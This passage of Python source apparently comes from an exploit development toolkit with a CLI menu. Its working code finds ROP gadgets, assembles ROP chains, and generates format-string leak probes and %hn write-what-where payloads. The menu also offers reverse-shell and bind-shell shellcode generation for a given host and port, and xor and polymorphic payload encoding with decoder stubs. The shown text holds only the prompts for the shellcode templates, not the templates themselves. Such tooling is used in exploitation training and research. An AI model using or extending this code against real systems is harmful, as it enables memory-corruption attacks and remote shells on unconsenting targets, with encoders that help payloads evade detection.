'value': value if isinstance(value, str) else hex(value),
'matched': needle,
'matched_hex': needle.encode('ascii', errors='replace').hex(),
'endian': 'little-endian' if search_strings.index(needle) % 2 == 1 else 'big-endian',
'pattern_length': len(pattern),
}
return {
'offset': -1,
'error': f'Value {value} not found in pattern of length {len(pattern)}',
'value': str(value),
'pattern_length': len(pattern),
}
# -----------------------------------------------------------------------
# ROP Gadget Finding
# -----------------------------------------------------------------------
def find_rop_gadgets(self, binary_path, gadget_type=None, max_gadgets=200):
    """Search a binary for ROP gadgets with the first available backend.

    Backends are probed with ``find_tool`` in this order: ropper,
    ROPgadget, objdump.

    Args:
        binary_path: path to the binary to scan.
        gadget_type: None (all), pop_ret, xchg, mov, syscall, jmp_esp,
            call_reg.
        max_gadgets: maximum gadgets to return.

    Returns:
        The chosen backend's result dict, or ``{'error': ...}`` when the
        file does not exist or no backend tool is found.
    """
    if not os.path.isfile(binary_path):
        return {'error': f'File not found: {binary_path}'}
    # (tool name, handler method) pairs in order of preference.
    backends = (
        ('ropper', '_find_gadgets_ropper'),
        ('ROPgadget', '_find_gadgets_ropgadget'),
        ('objdump', '_find_gadgets_objdump'),
    )
    for tool_name, handler_name in backends:
        if find_tool(tool_name):
            handler = getattr(self, handler_name)
            return handler(binary_path, gadget_type, max_gadgets)
    return {'error': 'No disassembler found. Install ropper, ROPgadget, or objdump.'}
def _find_gadgets_ropper(self, binary_path, gadget_type, max_gadgets):
    """Run ropper on the binary and parse its gadget listing.

    Args:
        binary_path: path passed to ropper via ``-f``.
        gadget_type: optional type name, translated to a ``--search`` term
            (unknown names are passed through as the term itself).
        max_gadgets: stop collecting once this many gadgets are gathered.

    Returns:
        dict with 'binary', 'tool', 'count' and 'gadgets', or
        ``{'error': ...}`` if ropper times out or cannot be started.
    """
    argv = [find_tool('ropper'), '-f', binary_path, '--nocolor']
    if gadget_type:
        ropper_terms = {
            'pop_ret': 'pop',
            'xchg': 'xchg',
            'mov': 'mov',
            'syscall': 'syscall',
            'jmp_esp': 'jmp esp',
            'call_reg': 'call',
        }
        argv += ['--search', ropper_terms.get(gadget_type, gadget_type)]
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=60)
    except (subprocess.TimeoutExpired, FileNotFoundError):
        return {'error': 'ropper execution failed'}

    # Expected row shape: 0xaddress: instruction; instruction; ret;
    row_re = re.compile(r'(0x[0-9a-fA-F]+):\s+(.*)')
    found = []
    for raw_line in proc.stdout.strip().split('\n'):
        text = raw_line.strip()
        # Skip blanks, separators, headings and bracketed status lines.
        if not text or text.startswith(('=', 'Gadgets', '[')):
            continue
        parsed = row_re.match(text)
        if parsed is None:
            continue
        address, body = parsed.groups()
        body = body.strip().rstrip(';').strip()
        found.append({
            'address': address,
            'gadget': body,
            'type': self._classify_gadget(body),
        })
        if len(found) >= max_gadgets:
            break
    return {
        'binary': binary_path,
        'tool': 'ropper',
        'count': len(found),
        'gadgets': found,
    }
def _find_gadgets_ropgadget(self, binary_path, gadget_type, max_gadgets):
    """Run ROPgadget on the binary and parse its gadget listing.

    Args:
        binary_path: path passed to ROPgadget via ``--binary``.
        gadget_type: optional type name; gadgets whose classification
            differs are dropped.
        max_gadgets: stop collecting once this many gadgets are gathered.

    Returns:
        dict with 'binary', 'tool', 'count' and 'gadgets', or
        ``{'error': ...}`` if ROPgadget times out or cannot be started.
    """
    argv = [find_tool('ROPgadget'), '--binary', binary_path]
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=60)
    except (subprocess.TimeoutExpired, FileNotFoundError):
        return {'error': 'ROPgadget execution failed'}

    # Expected row shape: 0xaddress : instruction ; instruction ; ret
    row_re = re.compile(r'(0x[0-9a-fA-F]+)\s+:\s+(.*)')
    found = []
    for raw_line in proc.stdout.strip().split('\n'):
        parsed = row_re.match(raw_line.strip())
        if parsed is None:
            continue
        body = parsed.group(2).strip()
        kind = self._classify_gadget(body)
        if gadget_type and kind != gadget_type:
            continue
        found.append({
            'address': parsed.group(1),
            'gadget': body,
            'type': kind,
        })
        if len(found) >= max_gadgets:
            break
    return {
        'binary': binary_path,
        'tool': 'ROPgadget',
        'count': len(found),
        'gadgets': found,
    }
def _find_gadgets_objdump(self, binary_path, gadget_type, max_gadgets):
    """Find gadgets by scanning an objdump disassembly.

    Every instruction ending in ``ret``, ``syscall`` or ``int 0x80`` closes
    a gadget. For each such instruction, the instructions parsed from the
    five preceding output lines are used to form every suffix chain that
    ends at it.

    Args:
        binary_path: path of the binary handed to ``objdump -d -M intel``.
        gadget_type: optional type name; chains whose classification
            differs are dropped.
        max_gadgets: stop collecting once this many chains are gathered
            (counted before de-duplication).

    Returns:
        dict with 'binary', 'tool', 'count' and 'gadgets', or
        ``{'error': ...}`` if objdump times out or cannot be started.
    """
    objdump = find_tool('objdump')
    try:
        result = subprocess.run(
            [objdump, '-d', '-M', 'intel', binary_path],
            capture_output=True, text=True, timeout=120
        )
    except (subprocess.TimeoutExpired, FileNotFoundError):
        return {'error': 'objdump execution failed'}

    # address: hex bytes   mnemonic operands
    instr_re = re.compile(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)')
    ending_re = re.compile(r'(?:ret|syscall|int\s+0x80)\s*$')

    # Parse each line once. Non-instruction lines (labels, blanks, section
    # headers) become None so positions still line up with the raw output.
    parsed = []
    for line in result.stdout.split('\n'):
        m = instr_re.match(line.strip())
        parsed.append((m.group(1), m.group(3).strip()) if m else None)

    gadgets = []
    for i, entry in enumerate(parsed):
        if entry is None or not ending_re.search(entry[1]):
            continue
        # Look back up to 5 lines. Address and text are kept together so a
        # skipped non-instruction line cannot shift the reported address
        # onto the wrong instruction.
        window = [p for p in parsed[max(0, i - 5):i + 1] if p is not None]
        for start in range(len(window)):
            gadget_str = ' ; '.join(text for _, text in window[start:])
            gtype = self._classify_gadget(gadget_str)
            if gadget_type and gtype != gadget_type:
                continue
            gadgets.append({
                'address': f'0x{window[start][0]}',
                'gadget': gadget_str,
                'type': gtype,
            })
            if len(gadgets) >= max_gadgets:
                break
        if len(gadgets) >= max_gadgets:
            break

    # Deduplicate on (address, gadget text), keeping first occurrences.
    seen = set()
    unique = []
    for g in gadgets:
        key = g['address'] + g['gadget']
        if key not in seen:
            seen.add(key)
            unique.append(g)
    return {
        'binary': binary_path,
        'tool': 'objdump',
        'count': len(unique),
        'gadgets': unique,
    }
def _classify_gadget(self, gadget_str):
"""Classify a gadget by its instruction pattern."""
g = gadget_str.lower()
if re.search(r'pop\s+\w+.*ret', g):
return 'pop_ret'
if 'xchg' in g:
return 'xchg'
if 'syscall' in g or 'int 0x80' in g:
return 'syscall'
if re.search(r'jmp\s+(esp|rsp)', g):
return 'jmp_esp'
if re.search(r'call\s+(eax|ebx|ecx|edx|esi|edi|rax|rbx|rcx|rdx|rsi|rdi|r\d+)', g):
return 'call_reg'
if 'mov' in g:
return 'mov'
if 'ret' in g:
return 'ret'
return 'other'
# -----------------------------------------------------------------------
# ROP Chain Builder
# -----------------------------------------------------------------------
def build_rop_chain(self, gadgets, chain_spec, word_size=None):
    """Assemble a ROP chain from gadgets and a chain specification.

    Every entry of the chain (gadget addresses and popped values) is packed
    little-endian using ONE word size for the whole chain, so a 64-bit
    chain built from low addresses (e.g. 0x401234) is no longer emitted as
    4-byte words.

    Args:
        gadgets: list of gadget dicts (address, gadget, type)
        chain_spec: list of dicts describing desired chain:
            [
                {'gadget_type': 'pop_ret', 'register': 'rdi', 'value': '0x...'},
                {'gadget_type': 'pop_ret', 'register': 'rsi', 'value': '0x...'},
                {'gadget_type': 'syscall'},
                ...
            ]
        word_size: 4 or 8 to force the stack word width. When None
            (default) it is auto-detected: 8 if any supplied gadget has an
            address above 0xFFFFFFFF or mentions a 64-bit register name,
            otherwise 4.

    Returns:
        dict with chain bytes (hex), addresses, and debug info, or a dict
        with an 'error' key when the inputs are unusable.

    Raises:
        ValueError: if a selected gadget address or a step value cannot be
            parsed as an integer.
    """
    if not gadgets:
        return {'error': 'No gadgets provided'}
    if not chain_spec:
        return {'error': 'No chain specification provided'}
    if word_size not in (None, 4, 8):
        return {'error': 'word_size must be 4 or 8'}

    if word_size is None:
        # rax/rbx/.., rsi/rdi, rsp/rbp, rip and r8-r15 only exist in 64-bit code.
        wide_reg = re.compile(
            r'\br(?:[abcd]x|[sd]i|[sb]p|ip|(?:[89]|1[0-5])[dwb]?)\b')
        word_size = 4
        for g in gadgets:
            try:
                wide_addr = int(str(g.get('address', '0')), 16) > 0xFFFFFFFF
            except ValueError:
                wide_addr = False  # malformed entry: ignore for detection only
            if wide_addr or wide_reg.search(str(g.get('gadget', '')).lower()):
                word_size = 8
                break

    pack_fmt = '<Q' if word_size == 8 else '<I'
    word_mask = (1 << (8 * word_size)) - 1

    # Index gadgets by type
    by_type = {}
    for g in gadgets:
        by_type.setdefault(g.get('type', 'other'), []).append(g)

    chain_addrs = []
    chunks = []
    debug_lines = []
    for step in chain_spec:
        gtype = step.get('gadget_type', step.get('type', 'pop_ret'))
        # 'register' may be present but None (e.g. JSON null).
        register = (step.get('register') or '').lower()

        candidates = by_type.get(gtype, [])
        if register:
            # Prefer gadgets whose text mentions the register; if none do,
            # fall back to any gadget of the requested type.
            reg_candidates = [g for g in candidates
                              if register in g['gadget'].lower()]
            if reg_candidates:
                candidates = reg_candidates
        if not candidates:
            debug_lines.append(f'[!] No gadget found for: {gtype} {register}')
            continue

        gadget = candidates[0]  # Use first match
        addr_int = int(gadget['address'], 16)
        if not 0 <= addr_int <= word_mask:
            return {
                'error': f'Gadget address {gadget["address"]} does not fit '
                         f'in {word_size} bytes'
            }
        chunks.append(struct.pack(pack_fmt, addr_int))
        chain_addrs.append(gadget['address'])
        debug_lines.append(f'[+] {gadget["address"]}: {gadget["gadget"]}')

        # If pop_ret, add the value to be popped
        if gtype == 'pop_ret' and 'value' in step:
            value = step['value']
            val_int = int(value, 0) if isinstance(value, str) else int(value)
            chunks.append(struct.pack(pack_fmt, val_int & word_mask))
            debug_lines.append(f' => 0x{val_int:x}')

    chain_bytes = b''.join(chunks)
    return {
        'chain_hex': chain_bytes.hex(),
        'chain_length': len(chain_bytes),
        'addresses': chain_addrs,
        'steps': len(chain_spec),
        'matched': len(chain_addrs),
        'debug': '\n'.join(debug_lines),
        'python': self._chain_to_python(chain_bytes),
    }
def _chain_to_python(self, chain_bytes):
"""Convert chain bytes to Python struct.pack() calls."""
lines = ['from struct import pack', '', 'chain = b""']
width = 8 if len(chain_bytes) > 4 and len(chain_bytes) % 8 == 0 else 4
fmt = '<Q' if width == 8 else '<I'
for i in range(0, len(chain_bytes), width):
chunk = chain_bytes[i:i + width]
if len(chunk) == width:
val = struct.unpack(fmt, chunk)[0]
lines.append(f'chain += pack("{fmt}", 0x{val:x})')
return '\n'.join(lines)
# -----------------------------------------------------------------------
# Format String Exploitation
# -----------------------------------------------------------------------
def format_string_offset(self, binary_path=None, test_count=20):
    """Generate format string test payloads for offset discovery.

    Args:
        binary_path: optional binary path (unused, for UI consistency)
        test_count: number of positional probes to generate; coerced to
            int and capped at 100 (the string probe is capped at 10)

    Returns:
        dict with 'payloads' (one entry per probe style, each holding a
        'payload' string and a 'description'), the effective 'test_count'
        and a usage 'note'
    """
    test_count = min(int(test_count), 100)

    def probes(conversion, sep='.', limit=test_count):
        # '%1$<conv><sep>%2$<conv>...' for positions 1..limit
        return sep.join(f'%{pos}${conversion}' for pos in range(1, limit + 1))

    payloads = {
        'pointer_leak': {
            'payload': probes('p'),
            'description': 'Leak stack pointers at each offset',
        },
        'hex_leak': {
            'payload': probes('x'),
            'description': 'Leak stack values as hex (32-bit)',
        },
        'long_hex_leak': {
            'payload': probes('lx'),
            'description': 'Leak stack values as long hex (64-bit)',
        },
        'string_probe': {
            'payload': probes('s', sep='|', limit=min(test_count, 10)),
            'description': 'Attempt to read strings (may crash — use with caution)',
        },
        'marker_test': {
            'payload': 'AAAA' + probes('x'),
            'description': 'Find AAAA (0x41414141) marker on stack to determine input offset',
        },
    }
    note = ('Feed each payload to the vulnerable printf-like function. '
            'The offset where your marker appears is your format string offset.')
    return {
        'payloads': payloads,
        'test_count': test_count,
        'note': note,
    }
def format_string_write(self, address, value, offset):
    """Generate a write-what-where format string payload.

    Each payload is the hex encoding of the packed target addresses
    followed by the literal ``%<pad>c`` / ``%<n>$hn`` directives. The
    target addresses are laid out in ascending order, so positional
    argument ``offset + i`` always refers to ``address + 2 * i``, and the
    padding accounts for the address bytes that are printed before the
    first directive.

    Args:
        address: target address to write to (hex string or int)
        value: value to write (hex string or int)
        offset: format string offset where input appears on stack

    Returns:
        dict with 'payload_32bit' and 'payload_64bit' entries. An entry
        whose target addresses do not fit the pointer width carries an
        empty 'payload' and an explanatory 'description' instead of
        raising.
    """
    if isinstance(address, str):
        address = int(address, 0)
    if isinstance(value, str):
        value = int(value, 0)
    offset = int(offset)

    def build_payload(word_count, pack_fmt):
        """Return the payload text, or None if the addresses do not fit."""
        ptr_max = (1 << (8 * struct.calcsize(pack_fmt))) - 1
        targets = [address + 2 * i for i in range(word_count)]
        if address < 0 or targets[-1] > ptr_max:
            return None
        prefix = b''.join(struct.pack(pack_fmt, t) for t in targets)
        prefix_len = len(prefix)
        # Order the 16-bit writes by how far the output counter has to
        # advance from its starting point, which minimises total padding.
        writes = sorted(
            (((value >> (16 * i)) & 0xFFFF, offset + i)
             for i in range(word_count)),
            key=lambda w: (w[0] - prefix_len) % 0x10000,
        )
        parts = []
        printed = prefix_len % 0x10000  # the address bytes count as output
        for word, arg_index in writes:
            pad = (word - printed) % 0x10000
            if pad:
                parts.append(f'%{pad}c')
            parts.append(f'%{arg_index}$hn')
            printed = word
        return prefix.hex() + ''.join(parts)

    results = {}

    # 32-bit write (write 4 bytes as two %hn writes)
    payload_32 = build_payload(2, '<I')
    if payload_32 is None:
        results['payload_32bit'] = {
            'payload': '',
            'description': f'Not generated: 0x{address:x} does not fit in a 32-bit pointer',
            'addresses': '',
        }
    else:
        results['payload_32bit'] = {
            'payload': payload_32,
            'description': f'Write 0x{value:08x} to 0x{address:08x} (32-bit, two %hn writes)',
            'addresses': f'0x{address:08x}, 0x{address + 2:08x}',
        }

    # 64-bit write (write 8 bytes as four %hn writes)
    payload_64 = build_payload(4, '<Q')
    if payload_64 is None:
        results['payload_64bit'] = {
            'payload': '',
            'description': f'Not generated: 0x{address:x} does not fit in a 64-bit pointer',
        }
    else:
        results['payload_64bit'] = {
            'payload': payload_64,
            'description': f'Write 0x{value:016x} to 0x{address:016x} (64-bit, four %hn writes)',
        }
    return results
# -----------------------------------------------------------------------
# Assembly / Disassembly
# -----------------------------------------------------------------------
def assemble(self, code, arch='x64'):
    """Assemble assembly code to machine code bytes.

    NASM (x86 family only) is used when both nasm and objcopy are found;
    otherwise keystone-engine is tried. ARM source is never handed to
    NASM, so it reaches keystone even on machines that have nasm
    installed.

    Args:
        code: assembly source (NASM syntax)
        arch: x86, x64, arm (None is treated as x64)

    Returns:
        dict with hex bytes, raw length and formatted variants, or a dict
        with an 'error' key.
    """
    if not code or not code.strip():
        return {'error': 'No assembly code provided'}
    arch = (arch or 'x64').lower().strip()

    # NASM only targets x86-family CPUs; routing ARM to it would either
    # fail or mislabel x86 output as ARM.
    nasm_capable = not arch.startswith(('arm', 'aarch'))
    if nasm_capable:
        nasm = find_tool('nasm')
        objcopy = find_tool('objcopy')
        if nasm and objcopy:
            return self._assemble_nasm(code, arch, nasm, objcopy)

    # Try keystone-engine
    try:
        import keystone  # noqa: F401 - availability probe only
        return self._assemble_keystone(code, arch)
    except ImportError:
        pass

    if not nasm_capable:
        return {
            'error': f"No assembler available for arch '{arch}'. pip install keystone-engine."
        }
    return {
        'error': 'No assembler available. Install nasm + objcopy, or pip install keystone-engine.'
    }
def _assemble_nasm(self, code, arch, nasm_path, objcopy_path):
"""Assemble using NASM."""
# Set BITS directive based on arch
bits_map = {'x86': '32', 'x64': '64', 'i386': '32', 'amd64': '64'}
bits = bits_map.get(arch, '64')
# Prepend BITS directive if not already present
if 'bits' not in code.lower():
code = f'BITS {bits}\n{code}'
with tempfile.NamedTemporaryFile(suffix='.asm', mode='w', delete=False) as f:
f.write(code)
asm_path = f.name
obj_path = asm_path.replace('.asm', '.o')
bin_path = asm_path.replace('.asm', '.bin')
try:
# Assemble
result = subprocess.run(
[nasm_path, '-f', 'bin', '-o', bin_path, asm_path],
capture_output=True, text=True, timeout=10
)
if result.returncode != 0:
return {'error': f'NASM error: {result.stderr.strip()}'}
# Read binary output
with open(bin_path, 'rb') as bf:
machine_code = bf.read()
return {
'hex': machine_code.hex(),
'bytes': list(machine_code),
'length': len(machine_code),
'arch': arch,
'c_array': ', '.join(f'0x{b:02x}' for b in machine_code),
'python': 'b"' + ''.join(f'\\x{b:02x}' for b in machine_code) + '"',
}
except subprocess.TimeoutExpired:
return {'error': 'Assembly timed out'}
finally:
for p in (asm_path, obj_path, bin_path):
try:
os.unlink(p)
except OSError:
pass
def _assemble_keystone(self, code, arch):
    """Assemble using keystone-engine.

    Args:
        code: assembly source text
        arch: 'x86', 'x64' or 'arm'; any other value is assembled as x64

    Returns:
        dict with 'hex', 'bytes', 'length', 'arch', 'instructions',
        'c_array' and 'python', or a dict with an 'error' key when
        keystone rejects the source or emits no machine code.
    """
    import keystone

    arch_map = {
        'x86': (keystone.KS_ARCH_X86, keystone.KS_MODE_32),
        'x64': (keystone.KS_ARCH_X86, keystone.KS_MODE_64),
        'arm': (keystone.KS_ARCH_ARM, keystone.KS_MODE_ARM),
    }
    ks_arch, ks_mode = arch_map.get(arch, (keystone.KS_ARCH_X86, keystone.KS_MODE_64))

    try:
        ks = keystone.Ks(ks_arch, ks_mode)
        encoding, count = ks.asm(code)
    except keystone.KsError as e:
        return {'error': f'Keystone error: {e}'}

    # keystone's Python binding hands back (None, 0) when the source holds
    # no statements (e.g. only comments); bytes(None) would raise TypeError.
    if not encoding:
        return {'error': 'Keystone error: no machine code produced'}

    machine_code = bytes(encoding)
    return {
        'hex': machine_code.hex(),
        'bytes': list(machine_code),
        'length': len(machine_code),
        'arch': arch,
        'instructions': count,
        'c_array': ', '.join(f'0x{b:02x}' for b in machine_code),
        'python': 'b"' + ''.join(f'\\x{b:02x}' for b in machine_code) + '"',
    }
def disassemble(self, data, arch='x64', offset=0):
    """Disassemble machine code bytes to assembly.

    Backends are tried in order: capstone (if importable), objdump (if
    found via find_tool), then a plain hex listing.

    Args:
        data: hex string or bytes; in a string, spaces and ``\\x``
            prefixes are removed before decoding
        arch: x86, x64, arm
        offset: base address offset (coerced with int())

    Returns:
        dict with the disassembly listing, or a dict with an 'error' key
        for undecodable or empty input
    """
    if isinstance(data, str):
        cleaned = data.strip().replace(' ', '').replace('\\x', '')
        try:
            data = bytes.fromhex(cleaned)
        except ValueError:
            return {'error': 'Invalid hex data'}
    if not data:
        return {'error': 'No data to disassemble'}

    arch = arch.lower().strip()
    offset = int(offset)

    # Preferred backend: capstone
    try:
        import capstone
        return self._disasm_capstone(data, arch, offset)
    except ImportError:
        pass

    # Otherwise objdump when present, else the byte listing of last resort
    fallback = self._disasm_objdump if find_tool('objdump') else self._disasm_basic
    return fallback(data, arch, offset)
def _disasm_capstone(self, data, arch, offset):
    """Disassemble using capstone.

    Args:
        data: machine code bytes
        arch: 'x86', 'x64' or 'arm'; any other value is decoded as x64
        offset: address assigned to the first byte

    Returns:
        dict with per-instruction records ('address', 'bytes', 'mnemonic',
        'operands', 'text'), a printable 'listing', the instruction
        'count', 'arch', 'tool' and 'data_length'
    """
    import capstone

    modes = {
        'x86': (capstone.CS_ARCH_X86, capstone.CS_MODE_32),
        'x64': (capstone.CS_ARCH_X86, capstone.CS_MODE_64),
        'arm': (capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM),
    }
    selected = modes.get(arch, (capstone.CS_ARCH_X86, capstone.CS_MODE_64))
    engine = capstone.Cs(*selected)
    engine.detail = False

    decoded = []
    rows = []
    for address, length, mnemonic, operands in engine.disasm_lite(data, offset):
        # Addresses are offset-based; map back to an index into data.
        start = address - offset
        entry = {
            'address': f'0x{address:08x}',
            'bytes': data[start:start + length].hex(),
            'mnemonic': mnemonic,
            'operands': operands,
            'text': f'{mnemonic} {operands}'.strip(),
        }
        decoded.append(entry)
        rows.append(f'{entry["address"]}: {entry["bytes"]:<20s} {entry["text"]}')

    return {
        'instructions': decoded,
        'listing': '\n'.join(rows),
        'count': len(decoded),
        'arch': arch,
        'tool': 'capstone',
        'data_length': len(data),
    }
def _disasm_objdump(self, data, arch, offset):
    """Disassemble using objdump.

    The bytes are written to a temporary file and decoded with
    ``objdump -D -b binary`` in Intel syntax.

    Args:
        data: machine code bytes
        arch: 'x86', 'x64' or 'arm'; any other value is decoded as x86-64
        offset: value passed to ``--adjust-vma``

    Returns:
        dict with per-instruction records ('address', 'bytes', 'text'), a
        printable 'listing', 'count', 'arch', 'tool' and 'data_length';
        or a dict with an 'error' key when objdump is missing, cannot be
        started, times out, or fails without producing any instruction.
    """
    objdump = find_tool('objdump')
    if not objdump:
        return {'error': 'objdump not found'}

    arch_map = {'x86': 'i386', 'x64': 'i386:x86-64', 'arm': 'arm'}
    obj_arch = arch_map.get(arch, 'i386:x86-64')
    # "<addr>:  <hex bytes>   <instruction text>"
    line_re = re.compile(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)')

    with tempfile.NamedTemporaryFile(suffix='.bin', delete=False) as f:
        f.write(data)
        bin_path = f.name

    try:
        result = subprocess.run(
            [objdump, '-D', '-b', 'binary', '-m', obj_arch,
             '-M', 'intel', '--adjust-vma', str(offset), bin_path],
            capture_output=True, text=True, timeout=10
        )
        instructions = []
        for line in result.stdout.strip().split('\n'):
            match = line_re.match(line)
            if match:
                instructions.append({
                    'address': f'0x{match.group(1)}',
                    'bytes': match.group(2).strip().replace(' ', ''),
                    'text': match.group(3).strip(),
                })

        # A failed run used to look like a successful empty listing.
        if not instructions and result.returncode != 0:
            return {'error': f'objdump error: {result.stderr.strip()}'}

        listing = '\n'.join(
            f'{i["address"]}: {i["bytes"]:<20s} {i["text"]}'
            for i in instructions
        )
        return {
            'instructions': instructions,
            'listing': listing,
            'count': len(instructions),
            'arch': arch,
            'tool': 'objdump',
            'data_length': len(data),
        }
    except subprocess.TimeoutExpired:
        return {'error': 'Disassembly timed out'}
    except OSError as exc:
        return {'error': f'Failed to run objdump: {exc}'}
    finally:
        # Best-effort removal of the temporary input file.
        try:
            os.unlink(bin_path)
        except OSError:
            pass
def _disasm_basic(self, data, arch, offset):
"""Basic hex dump when no disassembler is available."""
listing_lines = []
for i in range(0, len(data), 16):
chunk = data[i:i + 16]
addr = offset + i
hex_part = ' '.join(f'{b:02x}' for b in chunk)
ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
listing_lines.append(f'0x{addr:08x}: {hex_part:<48s} {ascii_part}')
return {
'instructions': [],
'listing': '\n'.join(listing_lines),
'count': 0,
'arch': arch,
'tool': 'hex_dump (no disassembler available)',
'data_length': len(data),
'note': 'Install capstone or objdump for proper disassembly.',
}
# -----------------------------------------------------------------------
# Hex Dump
# -----------------------------------------------------------------------
def hex_dump(self, data, offset=0):
    """Format bytes as a hex dump with ASCII sidebar.

    Args:
        data: bytes or hex string; in a string, spaces and ``\\x``
            prefixes are removed before decoding
        offset: starting address offset (coerced with int())

    Returns:
        dict with the formatted 'dump' string, the byte 'length' and the
        'offset'; or ``{'error': 'Invalid hex data'}`` when a hex string
        cannot be decoded (same convention as disassemble()).
    """
    if isinstance(data, str):
        try:
            data = bytes.fromhex(data.replace(' ', '').replace('\\x', ''))
        except ValueError:
            return {'error': 'Invalid hex data'}
    # Offsets may arrive as numeric strings from a UI form.
    offset = int(offset)

    lines = []
    for i in range(0, len(data), 16):
        chunk = data[i:i + 16]
        addr = offset + i
        # Pad short rows so the ASCII sidebar stays aligned.
        hex_part = f"{' '.join(f'{b:02x}' for b in chunk):<48s}"
        ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
        lines.append(f'{addr:08x} {hex_part} |{ascii_part}|')
    return {
        'dump': '\n'.join(lines),
        'length': len(data),
        'offset': offset,
    }
# -----------------------------------------------------------------------
# CLI interface
# -----------------------------------------------------------------------
def run():
    """CLI menu for exploit development toolkit.

    Redraws the menu, reads a choice and dispatches to the matching
    ``_cli_*`` helper until the user enters ``0``. Unrecognised input
    simply redraws the menu.
    """
    dev = get_exploit_dev()
    # (key, label, handler) in display order
    menu = (
        ('1', 'Shellcode Generator', _cli_shellcode),
        ('2', 'Payload Encoder', _cli_encoder),
        ('3', 'Pattern Create', _cli_pattern_create),
        ('4', 'Pattern Offset', _cli_pattern_offset),
        ('5', 'ROP Gadgets', _cli_rop_gadgets),
        ('6', 'Disassemble', _cli_disassemble),
    )
    handlers = {key: handler for key, _, handler in menu}

    while True:
        clear_screen()
        display_banner()
        print(f"\n{Colors.RED}{Colors.BOLD} Exploit Development Toolkit{Colors.RESET}")
        print(f"{Colors.DIM} Shellcode, encoders, ROP chains, patterns{Colors.RESET}")
        for position, (key, label, _) in enumerate(menu):
            # Only the first entry is preceded by a blank line.
            lead = "\n" if position == 0 else ""
            print(f"{lead}{Colors.CYAN} {key}{Colors.RESET} {label}")
        print(f"{Colors.CYAN} 0{Colors.RESET} Back")

        choice = input(f"\n{Colors.WHITE} [{Colors.RED}exploit-dev{Colors.WHITE}]> {Colors.RESET}").strip()
        if choice == '0':
            break
        action = handlers.get(choice)
        if action is not None:
            action(dev)
def _cli_shellcode(dev):
    """CLI: Shellcode generator.

    Lists the templates reported by ``dev.list_shellcodes()``, prompts for
    the generation parameters (blank answers fall back to execve / x64 /
    linux / hex; blank host or port is passed as None) and prints either
    the generated shellcode or the error.
    """
    def ask(label, default='', lead=''):
        answer = input(f"{lead}{Colors.WHITE}{label}: {Colors.RESET}").strip()
        return answer or default

    print(f"\n{Colors.BOLD}Available shellcode templates:{Colors.RESET}")
    for sc in dev.list_shellcodes():
        print(f" {Colors.CYAN}{sc['name']}{Colors.RESET}{sc['description']} ({sc['length']} bytes)")

    shell_type = ask('Shell type (reverse_shell/bind_shell/execve)', 'execve', lead='\n')
    arch = ask('Architecture (x86/x64/arm)', 'x64')
    platform = ask('Platform (linux/windows)', 'linux')
    host = ask('Host IP (for reverse/bind, or skip)')
    port = ask('Port (for reverse/bind, or skip)')
    fmt = ask('Output format (hex/c_array/python/nasm)', 'hex')

    result = dev.generate_shellcode(
        shell_type, arch, host or None, port or None, platform, output_format=fmt)
    if 'error' not in result:
        print(f"\n{Colors.GREEN}[+] Generated {result['length']} bytes ({result['template']}){Colors.RESET}")
        print(f"{Colors.DIM}{result['description']}{Colors.RESET}")
        print(f"\n{result['shellcode']}")
    else:
        print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def _cli_encoder(dev):
    """CLI: Payload encoder.

    Prompts for shellcode hex, encoder, key and iteration count, then
    prints the result of ``dev.encode_payload``. Returns immediately when
    no shellcode is entered. A non-numeric iteration count is reported as
    an error instead of raising out of the menu loop.
    """
    sc_hex = input(f"\n{Colors.WHITE}Shellcode (hex): {Colors.RESET}").strip()
    if not sc_hex:
        return
    encoder = input(f"{Colors.WHITE}Encoder (xor/aes/alphanumeric/polymorphic): {Colors.RESET}").strip() or 'xor'
    key = input(f"{Colors.WHITE}Key (hex/string, or blank for random): {Colors.RESET}").strip() or None
    iters = input(f"{Colors.WHITE}Iterations (default 1): {Colors.RESET}").strip() or '1'

    try:
        iterations = int(iters)
    except ValueError:
        print(f"\n{Colors.RED}Error: Iterations must be a whole number, got {iters!r}{Colors.RESET}")
        input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        return

    result = dev.encode_payload(sc_hex, encoder, key, iterations)
    if 'error' in result:
        print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
    else:
        print(f"\n{Colors.GREEN}[+] Encoded: {result['original_length']} -> {result['encoded_length']} bytes ({result['size_increase']}){Colors.RESET}")
        print(f"Key: {result['key']}")
        print(f"Null-free: {result['null_free']}")
        print(f"\n{Colors.CYAN}Decoder Stub:{Colors.RESET}\n{result['decoder_stub']}")
        print(f"\n{Colors.CYAN}Encoded payload (hex):{Colors.RESET}\n{result['encoded']}")
    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def _cli_pattern_create(dev):
    """CLI: Pattern create.

    Prompts for a length and prints the pattern from
    ``dev.generate_pattern``. Returns immediately on blank input. A
    non-numeric length is reported as an error instead of raising out of
    the menu loop.
    """
    length = input(f"\n{Colors.WHITE}Pattern length: {Colors.RESET}").strip()
    if not length:
        return

    try:
        wanted = int(length)
    except ValueError:
        print(f"\n{Colors.RED}Error: Pattern length must be a whole number, got {length!r}{Colors.RESET}")
        input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        return

    result = dev.generate_pattern(wanted)
    if 'error' in result:
        print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
    else:
        print(f"\n{Colors.GREEN}[+] Pattern ({result['length']} bytes):{Colors.RESET}")
        print(result['pattern'])
    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def _cli_pattern_offset(dev):
    """CLI: Pattern offset finder.

    Prompts for the value to locate and the pattern length (default
    20000), then prints the offset reported by
    ``dev.find_pattern_offset`` or its error. Returns immediately when no
    value is entered. A non-numeric length is reported as an error
    instead of raising out of the menu loop.
    """
    value = input(f"\n{Colors.WHITE}Value to find (hex/int/string): {Colors.RESET}").strip()
    if not value:
        return
